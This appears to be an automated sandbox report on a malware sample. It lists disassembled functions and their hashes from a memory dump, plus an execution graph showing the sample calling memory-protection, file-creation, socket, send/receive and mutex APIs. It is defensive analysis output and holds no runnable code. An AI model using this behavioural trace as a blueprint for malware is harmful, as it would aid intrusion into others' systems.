                                                                                                                    • Opcode Fuzzy Hash: a15a49fb6afeb9bf97ffaef5b7b7372cc447a3bff4fb084c2f07f8c042b6b953
                                                                                                                    • Instruction Fuzzy Hash: 7090022120184483D14072985804B0F410597E1202F96C029A4156554CC95989555721
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A335C0 Relevance: .0, Instructions: 4COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: da374211b8753cd073688a75cdc5d9990f6af082ca10791869b45e81bda9a5d2
                                                                                                                    • Instruction ID: b0ea203ea4df6c21c9e35c1054dfd242895bed1ebae0d5d09e35501e45805a11
                                                                                                                    • Opcode Fuzzy Hash: da374211b8753cd073688a75cdc5d9990f6af082ca10791869b45e81bda9a5d2
                                                                                                                    • Instruction Fuzzy Hash: DD90023160550443D10071985514706100597D0201F66C421A0424568DC7D98A5166A2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A339B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ca028233be5227882407ec786dc44879c3b8d3a12fc1bb0ee41505ada5a6b2c2
                                                                                                                    • Instruction ID: 22dcf5eb949f453b8f1d1a9c6136e9c79fc08195bb27766dda2ba77cdf0442f2
                                                                                                                    • Opcode Fuzzy Hash: ca028233be5227882407ec786dc44879c3b8d3a12fc1bb0ee41505ada5a6b2c2
                                                                                                                    • Instruction Fuzzy Hash: 7C90022124545143D150719C54046164005B7E0201F56C031A0814594DC59989556321
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A33D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1dbd4d9bde8ef5b9646c4471ccfa8e3af378297e707e1b386d5f402aedb4e45a
                                                                                                                    • Instruction ID: c9827fa3e60b825433b8c64456732f29708fd6cbedca589ab62e4a527c5e5795
                                                                                                                    • Opcode Fuzzy Hash: 1dbd4d9bde8ef5b9646c4471ccfa8e3af378297e707e1b386d5f402aedb4e45a
                                                                                                                    • Instruction Fuzzy Hash: B490023120240183954072986804A4E410597E1302F96D425A0015554CC95889615321
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A33D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e4a723561bac96872797427c930538aba4357197b738f754341c8df279a35368
                                                                                                                    • Instruction ID: 799364a17901a2572caf53e7fb4818057e102d84a51ca367ec2b6f972477b2bf
                                                                                                                    • Opcode Fuzzy Hash: e4a723561bac96872797427c930538aba4357197b738f754341c8df279a35368
                                                                                                                    • Instruction Fuzzy Hash: 1D90023520140443D51071986804646004697D0301F56D421A0424558DC69889A1A221
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A32C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                    • Instruction ID: 8cf804a0df535b00bb157c5f8307e09a4e10ebcb10f88e2a52463d41c3fc3549
                                                                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A32890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ___swprintf_l
                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                    • Opcode ID: d1a33ce88619369b22bac6384bcedd16aa6526b08c3e5d539fd0e6d6e8efd5ac
                                                                                                                    • Instruction ID: 13237f3eeaf17867cdfb4c095762b584fc0653bf804b7b33c6d1faab825b30b0
                                                                                                                    • Opcode Fuzzy Hash: d1a33ce88619369b22bac6384bcedd16aa6526b08c3e5d539fd0e6d6e8efd5ac
                                                                                                                    • Instruction Fuzzy Hash: 8851C8B5A00116BFDB11DFACC990B7EFBB8BB88240754816AF5A9D7641D334DE4087A0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01AA2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ___swprintf_l
                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                    • Opcode ID: b97ad543ad70a55716250f3d44ad2b6df9f9b52610a1146312e2ac40630f44d0
                                                                                                                    • Instruction ID: ff3e1ecb1d562544fa69f0147b023806106820a6fced585fd1989e798267cdb9
                                                                                                                    • Opcode Fuzzy Hash: b97ad543ad70a55716250f3d44ad2b6df9f9b52610a1146312e2ac40630f44d0
                                                                                                                    • Instruction Fuzzy Hash: BD510871A00646AFDB31DF6CC990A7FB7F9FB44200B84846AE5D6C7642E774DA508760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A27630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01A64742
                                                                                                                    • ExecuteOptions, xrefs: 01A646A0
                                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01A646FC
                                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01A64655
                                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 01A64787
                                                                                                                    • Execute=1, xrefs: 01A64713
                                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01A64725
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                    • API String ID: 0-484625025
                                                                                                                    • Opcode ID: 14913cd741804dfc44a0beb4a91f631d29584618a192ebb9b22f4b5ef5c6fa6c
                                                                                                                    • Instruction ID: e2b3363def9c4d662410c42fa26b1159b5116e014265740779686d001e3f5c62
                                                                                                                    • Opcode Fuzzy Hash: 14913cd741804dfc44a0beb4a91f631d29584618a192ebb9b22f4b5ef5c6fa6c
                                                                                                                    • Instruction Fuzzy Hash: 6E51FA3160022A7AEF21EBEDDD89FBA77B8AF68304F1400A9E605A7191D7719F458F50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A3B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __aulldvrm
                                                                                                                    • String ID: +$-$0$0
                                                                                                                    • API String ID: 1302938615-699404926
                                                                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                    • Instruction ID: 80e8cb5deb6ad148d9e85ca3ceabbaf7e4556d9391999bc0b875646e88b8417f
                                                                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                    • Instruction Fuzzy Hash: 95816E70E062499EEF268F68C8517EEBBB3EFC5320F18415AF851A7292C73499418B71
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01AA20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ___swprintf_l
                                                                                                                    • String ID: %%%u$[$]:%u
                                                                                                                    • API String ID: 48624451-2819853543
                                                                                                                    • Opcode ID: 384dec9bb5f8dd4b974e9bdde53ed6da88831de4e69dd87e7cfbab8d83cf998b
                                                                                                                    • Instruction ID: 8b4b463c4995456b45ee79c6bcf16a13df719826c3026b2cc93237862d5c5a03
                                                                                                                    • Opcode Fuzzy Hash: 384dec9bb5f8dd4b974e9bdde53ed6da88831de4e69dd87e7cfbab8d83cf998b
                                                                                                                    • Instruction Fuzzy Hash: BA21477AA00219ABDB21DF79DD44BFE7BF8EF94654F440116FA05D3200E735EA118BA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A1F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • RTL: Re-Waiting, xrefs: 01A6031E
                                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A602BD
                                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A602E7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                    • API String ID: 0-2474120054
                                                                                                                    • Opcode ID: bb58aec016bc0c7722c296d1dc902eaf7d2229ab116d335016d36fb70ade7da5
                                                                                                                    • Instruction ID: ed5ec609b6659bf76457f717268cf89c34cc9a928e9ff5be4e2dc89fc6f45533
                                                                                                                    • Opcode Fuzzy Hash: bb58aec016bc0c7722c296d1dc902eaf7d2229ab116d335016d36fb70ade7da5
                                                                                                                    • Instruction Fuzzy Hash: 34E19E706087829FD725CF28C984B2ABBE4BF84324F144A5DF5A5CB2E1D774D989CB42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A2BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • RTL: Resource at %p, xrefs: 01A67B8E
                                                                                                                    • RTL: Re-Waiting, xrefs: 01A67BAC
                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01A67B7F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                    • API String ID: 0-871070163
                                                                                                                    • Opcode ID: 6d7ddc9f9bbb94243eb3f9755d51c08a8b98c94dd00c233228172f7c5a18a54f
                                                                                                                    • Instruction ID: 51dfe2ee2822c28e9b56429eb68aa88d1f6dc0f1775cc1d1ffd9ea81486f384f
                                                                                                                    • Opcode Fuzzy Hash: 6d7ddc9f9bbb94243eb3f9755d51c08a8b98c94dd00c233228172f7c5a18a54f
                                                                                                                    • Instruction Fuzzy Hash: 1441CF317047129FD724DF2DC940F6AB7E5EF98720F100A1DFA5A9B680DB71E9058BA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A2B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A6728C
                                                                                                                    Strings
                                                                                                                    • RTL: Resource at %p, xrefs: 01A672A3
                                                                                                                    • RTL: Re-Waiting, xrefs: 01A672C1
                                                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01A67294
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                    • API String ID: 885266447-605551621
                                                                                                                    • Opcode ID: f31bd4e2ebf8400b20d077a60de937d8ce47b33ef0d50e6e3a45b5b1502555bc
                                                                                                                    • Instruction ID: a65fd0d81ed85c5fb7ad5bbc456ec3c5c827b67ae6c6f8bf0458f96d84c3a853
                                                                                                                    • Opcode Fuzzy Hash: f31bd4e2ebf8400b20d077a60de937d8ce47b33ef0d50e6e3a45b5b1502555bc
                                                                                                                    • Instruction Fuzzy Hash: 97410E31700212ABD720DF69CC81F6AB7A9FF94714F140619F995AB281DB30F8428BE1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01AA2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ___swprintf_l
                                                                                                                    • String ID: %%%u$]:%u
                                                                                                                    • API String ID: 48624451-3050659472
                                                                                                                    • Opcode ID: 7fa47a6d0acc82e87d1c56475602dfd492958a7986a55a7cb8dfffb60ae8df5d
                                                                                                                    • Instruction ID: 2c2dade428073f5b9a431ce03eb16c43aaa86bac23283239fa54580ecfaed4ec
                                                                                                                    • Opcode Fuzzy Hash: 7fa47a6d0acc82e87d1c56475602dfd492958a7986a55a7cb8dfffb60ae8df5d
                                                                                                                    • Instruction Fuzzy Hash: 3D316672A002199FDB20DF2DDD40BEFB7F8EF55610F84455AE949E3240EB309A558BA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A37D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __aulldvrm
                                                                                                                    • String ID: +$-
                                                                                                                    • API String ID: 1302938615-2137968064
                                                                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                    • Instruction ID: 6d4b01ca8df35f9bf721b7346f0af23c3d229fea5d3a65a7df3f460ac5e459fd
                                                                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                    • Instruction Fuzzy Hash: 659192F1E002169BEB24DFADC8817BEBBB1BFC4760F64461AF955A72C0D6348940CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019F9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $$@
                                                                                                                    • API String ID: 0-1194432280
                                                                                                                    • Opcode ID: 30e851f40e80f24e1740baa6b9111d0512d35a76f0a07b460dd3c76061c16065
                                                                                                                    • Instruction ID: 56ca804b960a0f8867367c849c611d3dc192c5ecc625507007937bd309b8a16b
                                                                                                                    • Opcode Fuzzy Hash: 30e851f40e80f24e1740baa6b9111d0512d35a76f0a07b460dd3c76061c16065
                                                                                                                    • Instruction Fuzzy Hash: C8812A75D00269DBDB71CB54CD44BEAB7B8AB48714F0441EAEA0DB7280E7709E85CFA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A7CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 01A7CFBD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CallFilterFunc@8
                                                                                                                    • String ID: @$@4Qw@4Qw
                                                                                                                    • API String ID: 4062629308-2383119779
                                                                                                                    • Opcode ID: 91fcefbd202a0c006ef6fc5d87fcc8f62472e40f152aa4ac886e5d018fa5579f
                                                                                                                    • Instruction ID: 4b5b31e0c4affd1df08dc9de2021c15f28244fdebbf8fa31f088cf62b78f8a18
                                                                                                                    • Opcode Fuzzy Hash: 91fcefbd202a0c006ef6fc5d87fcc8f62472e40f152aa4ac886e5d018fa5579f
                                                                                                                    • Instruction Fuzzy Hash: FB41CE71900215EFCB22DFA9DD44AAEBBF8FF54B20F00442AE906DB254D734CA42CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:2.3%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:4.7%
                                                                                                                    Total number of Nodes:446
                                                                                                                    Total number of Limit Nodes:16
                                                                                                                    execution_graph 13750 df119f1 13751 df119f7 13750->13751 13754 df06852 13751->13754 13753 df11a0f 13755 df068e4 13754->13755 13756 df06865 13754->13756 13755->13753 13756->13755 13758 df06887 13756->13758 13760 df0687e 13756->13760 13757 df0c36f 13757->13753 13758->13755 13762 df0a662 13758->13762 13760->13757 13773 df0c0c2 13760->13773 13763 df0a7ba 13762->13763 13764 df0a66b 13762->13764 13763->13755 13764->13763 13765 df040f2 6 API calls 13764->13765 13767 df0a6ee 13765->13767 13766 df0a750 13766->13763 13769 df0a83f 13766->13769 13771 df0a791 13766->13771 13767->13766 13768 df0ff82 6 API calls 13767->13768 13768->13766 13769->13763 13770 df0ff82 6 API calls 13769->13770 13770->13763 13771->13763 13772 df0ff82 6 API calls 13771->13772 13772->13763 13774 df0c0cb 13773->13774 13776 df0c1f0 13773->13776 13775 df0ff82 6 API calls 13774->13775 13774->13776 13775->13776 13776->13757 13777 df055f1 13778 df05606 13777->13778 13779 df0560e 13777->13779 13780 df0a662 6 API calls 13778->13780 13780->13779 13849 df040f1 13850 df04109 13849->13850 13851 df041d3 13849->13851 13852 df04012 6 API calls 13850->13852 13853 df04113 13852->13853 13853->13851 13854 df0ff82 6 API calls 13853->13854 13854->13851 13511 df0f232 13513 df0f25c 13511->13513 13514 df0f334 13511->13514 13512 df0f410 NtCreateFile 13512->13514 13513->13512 13513->13514 13785 df119b3 13786 df119bd 13785->13786 13789 df066d2 13786->13789 13788 df119e0 13790 df06704 13789->13790 13791 df066f7 13789->13791 13793 df0672d 13790->13793 13795 df06737 13790->13795 13797 df066ff 13790->13797 13792 df040f2 6 API calls 13791->13792 13792->13797 13798 df0c2c2 13793->13798 13796 df0ff82 6 API calls 13795->13796 13795->13797 13796->13797 13797->13788 13799 df0c2cb 13798->13799 13800 df0c2df 13798->13800 13799->13800 13801 df0c0c2 6 API calls 13799->13801 13800->13797 13801->13800 13855 df082f4 13857 df08349 13855->13857 13856 df0849f 13858 df048f2 NtProtectVirtualMemory 13856->13858 13862 df084c3 13856->13862 13857->13856 13859 df048f2 NtProtectVirtualMemory 13857->13859 13858->13862 13860 df08480 13859->13860 13861 df048f2 NtProtectVirtualMemory 13860->13861 13861->13856 13863 df048f2 NtProtectVirtualMemory 13862->13863 13864 df08597 13862->13864 13863->13864 13865 df048f2 NtProtectVirtualMemory 13864->13865 13866 df085bf 13864->13866 13865->13866 13870 df048f2 NtProtectVirtualMemory 13866->13870 13871 df086b9 13866->13871 13867 df086e1 13868 df0b382 ObtainUserAgentString 13867->13868 13869 df086e9 13868->13869 13870->13871 13871->13867 13872 df048f2 NtProtectVirtualMemory 13871->13872 13872->13867 13921 df0c0b9 13922 df0c1f0 13921->13922 13923 df0c0ed 13921->13923 13923->13922 13924 df0ff82 6 API calls 13923->13924 13924->13922 13810 df0ff7a 13811 df0ffb8 13810->13811 13812 df0c5b2 socket 13811->13812 13813 df10081 13811->13813 13820 df10022 13811->13820 13812->13813 13814 df10134 13813->13814 13816 df10117 getaddrinfo 13813->13816 13813->13820 13815 df0c732 connect 13814->13815 13817 df101b2 13814->13817 13814->13820 13815->13817 13816->13814 13818 df0c6b2 send 13817->13818 13817->13820 13819 df10729 13818->13819 13819->13820 13821 df107f4 setsockopt recv 13819->13821 13821->13820 13945 df0e83a 13946 df0e841 13945->13946 13947 df0ff82 6 API calls 13946->13947 13949 df0e8c5 13947->13949 13948 df0e906 13949->13948 13950 df0f232 NtCreateFile 13949->13950 13950->13948 13873 df080fb 13875 df08137 13873->13875 13874 df082d5 13875->13874 13876 df048f2 NtProtectVirtualMemory 13875->13876 13877 df0828a 13876->13877 13878 df048f2 NtProtectVirtualMemory 13877->13878 13881 df082a9 13878->13881 13879 df082cd 13880 df0b382 ObtainUserAgentString 13879->13880 13880->13874 13881->13879 13882 df048f2 NtProtectVirtualMemory 13881->13882 13882->13879 13925 df0a8be 13927 df0a8c3 13925->13927 13926 df0a9a6 13927->13926 13928 df0a995 ObtainUserAgentString 13927->13928 13928->13926 13802 df07fbf 13804 df08016 13802->13804 13803 df080f0 13804->13803 13807 df048f2 NtProtectVirtualMemory 13804->13807 13808 df080bb 13804->13808 13805 df080e8 13806 df0b382 ObtainUserAgentString 13805->13806 13806->13803 13807->13808 13808->13805 13809 df048f2 NtProtectVirtualMemory 13808->13809 13809->13805 13883 df09ce2 13885 df09dd9 13883->13885 13884 df0a022 13885->13884 13889 df09352 13885->13889 13887 df09f0d 13887->13884 13898 df09792 13887->13898 13891 df0939e 13889->13891 13890 df0958e 13890->13887 13891->13890 13892 df094ec 13891->13892 13894 df09595 13891->13894 13893 df0f232 NtCreateFile 13892->13893 13896 df094ff 13893->13896 13894->13890 13895 df0f232 NtCreateFile 13894->13895 13895->13890 13896->13890 13897 df0f232 NtCreateFile 13896->13897 13897->13890 13899 df097e0 13898->13899 13900 df0f232 NtCreateFile 13899->13900 13903 df0990c 13900->13903 13901 df09af3 13901->13887 13902 df09352 NtCreateFile 13902->13903 13903->13901 13903->13902 13904 df09602 NtCreateFile 13903->13904 13904->13903 13905 df0c2e4 13906 df0c36f 13905->13906 13907 df0c305 13905->13907 13907->13906 13908 df0c0c2 6 API calls 13907->13908 13908->13906 13826 df06b66 13828 df06b6a 13826->13828 13827 df06cce 13828->13827 13829 df06cb5 CreateMutexW 13828->13829 13829->13827 13929 df11aa9 13930 df11aaf 13929->13930 13933 df0c212 13930->13933 13932 df11ac7 13934 df0c237 13933->13934 13935 df0c21b 13933->13935 13934->13932 13935->13934 13936 df0c0c2 6 API calls 13935->13936 13936->13934 13951 df0b22a 13952 df0b25e 13951->13952 13953 df0a8c2 ObtainUserAgentString 13952->13953 13954 df0b26b 13953->13954 13521 df10bac 13522 df10bb1 13521->13522 13555 df10bb6 13522->13555 13556 df06b72 13522->13556 13524 df10c2c 13525 df10c85 13524->13525 13526 df10c54 13524->13526 13527 df10c69 13524->13527 13524->13555 13528 df0eab2 NtProtectVirtualMemory 13525->13528 13529 df0eab2 NtProtectVirtualMemory 13526->13529 13530 df10c80 13527->13530 13531 df10c6e 13527->13531 13532 df10c8d 13528->13532 13533 df10c5c 13529->13533 13530->13525 13535 df10c97 